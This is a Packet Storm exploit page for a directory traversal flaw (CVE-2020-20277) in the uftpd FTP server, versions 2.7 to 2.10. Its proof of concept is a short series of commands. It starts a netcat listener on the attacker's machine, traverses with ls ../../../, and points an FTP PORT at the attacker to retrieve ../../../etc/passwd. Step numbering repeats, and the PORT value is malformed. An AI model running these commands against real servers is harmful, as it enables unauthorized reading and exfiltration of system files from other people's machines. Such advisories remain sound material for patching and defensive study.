uftpd 2.10 Directory Traversal ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
# Google Dork: N/A
# Exploit Author: Aaron Esau (arinerron)
# Vendor Homepage: https://github.com/troglobit/uftpd
# Software Link: https://github.com/troglobit/uftpd
# Version: 2.7 to 2.10
# Tested on: Linux
# CVE : CVE-2020-20277
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
# Reference: https://arinerron.com/blog/posts/6
#Product: uftpd 2.7 to 2.10
#Proof-Of-Concept:
1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication. 
#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258
2-Login to the FTP service
3-List files 
ftp> ls ../../../
3-Set attacker's IP address and retrieve files
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd

• Follow us on Twitter^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (932)
• Advisory^[19] (77,852)
• Arbitrary^[20] (15,177)
• BBS^[21] (2,859)
• Bypass^[22] (1,575)
• CGI^[23] (1,013)
• Code Execution^[24] (6,709)
• Conference^[25] (671)
• Cracker^[26] (797)
• CSRF^[27] (3,273)
• DoS^[28] (21,911)
• Encryption^[29] (2,335)
• Exploit^[30] (49,961)
• File Inclusion^[31] (4,152)
• File Upload^[32] (945)
• Firewall^[33] (821)
• Info Disclosure^[34] (2,556)
• Intrusion Detection^[35] (857)
• Java^[36] (2,809)
• JavaScript^[37] (801)
• Kernel^[38] (6,078)
• Local^[39] (14,033)
• Magazine^[40] (586)
• Overflow^[41] (12,227)
• Perl^[42] (1,412)
• PHP^[43] (5,052)
• Proof of Concept^[44] (2,283)
• Protocol^[45] (3,325)
• Python^[46] (1,404)
• Remote^[47] (29,763)
• Root^[48] (3,452)
• Ruby^[49] (577)
• Scanner^[50] (1,630)
• Security Tool^[51] (7,711)
• Shell^[52] (3,066)
• Shellcode^[53] (1,203)
• Sniffer^[54] (882)
• Spoof^[55] (2,092)
• SQL Injection^[56] (16,034)
• TCP^[57] (2,362)
• Trojan^[58] (676)
• UDP^[59] (866)
• Virus^[60] (660)
• Vulnerability^[61] (30,516)
• Web^[62] (9,059)
• Whitepaper^[63] (3,720)
• x86^[64] (943)
• XSS^[65] (17,354)
• Other^[66]

File Archives

• August 2022^[67]
• July 2022^[68]
• June 2022^[69]
• May 2022^[70]
• April 2022^[71]
• March 2022^[72]
• February 2022^[73]
• January 2022^[74]
• December 2021^[75]
• November 2021^[76]
• October 2021^[77]
• September 2021^[78]
• Older^[79]

Systems

• AIX^[80] (426)
• Apple^[81] (1,890)
• BSD^[82] (368)
• CentOS^[83] (55)
• Cisco^[84] (1,913)
• Debian^[85] (5,948)
• Fedora^[86] (1,690)
• FreeBSD^[87] (1,241)
• Gentoo^[88] (4,153)
• HPUX^[89] (878)
• iOS^[90] (319)
• iPhone^[91] (108)
• IRIX^[92] (220)
• Juniper^[93] (67)
• Linux^[94] (42,507)
• Mac OS X^[95] (683)
• Mandriva^[96] (3,105)
• NetBSD^[97] (255)
• OpenBSD^[98] (478)
• RedHat^[99] (11,769)
• Slackware^[100] (941)
• Solaris^[101] (1,607)
• SUSE^[102] (1,444)
• Ubuntu^[103] (7,913)
• UNIX^[104] (9,094)
• UnixWare^[105] (185)
• Windows^[106] (6,436)
• Other^[107]

© 2022 Packet Storm. All rights reserved.